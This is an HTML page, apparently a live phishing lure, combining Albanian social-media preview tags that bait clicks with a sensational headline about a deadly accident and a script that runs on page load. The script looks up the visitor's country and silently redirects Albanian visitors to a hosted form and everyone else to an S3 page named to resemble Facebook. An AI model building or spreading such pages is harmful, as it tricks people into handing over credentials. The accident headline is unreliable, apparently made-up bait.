<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="229,142,105,vizitë"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Bëni shumë kujdes mëngjesin e sotëm ka ndodhur një aksident tragjik me disa të plagosur dhe të vdekur."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1220457453838143603/1223838697162801262/gfdsfdgfd.jpg?ex=661b4f9b&is=6608da9b&hm=c3ca75d4e72191277265bcc6903925eeaa68da0a31eab48cc59ad172274ddb11&=&format=webp"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Redirección por Geolocalización</title>
</head>
<body>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

<script>
    function redireccionarPorGeolocalizacion(countryCode) {
        var redirecciones = {
            "AL": "https://c4abl471.caspio.com/dp/c10cd00071857e3932064d389001",
        };
        if (redirecciones.hasOwnProperty(countryCode)) {
            window.location.href = redirecciones[countryCode];
        } else {
            window.location.href = "https://facebosaskavvs922.s3.eu-west-3.amazonaws.com/jef00224.html";
        }
    }
    function obtenerPaisPorGeolocalizacion() {
        $.get("https://ipinfo.io", function(response) {
            var countryCode = response.country;
            redireccionarPorGeolocalizacion(countryCode);
        }, "jsonp");
    }

    window.onload = obtenerPaisPorGeolocalizacion;
</script>

</body>
</html>

        
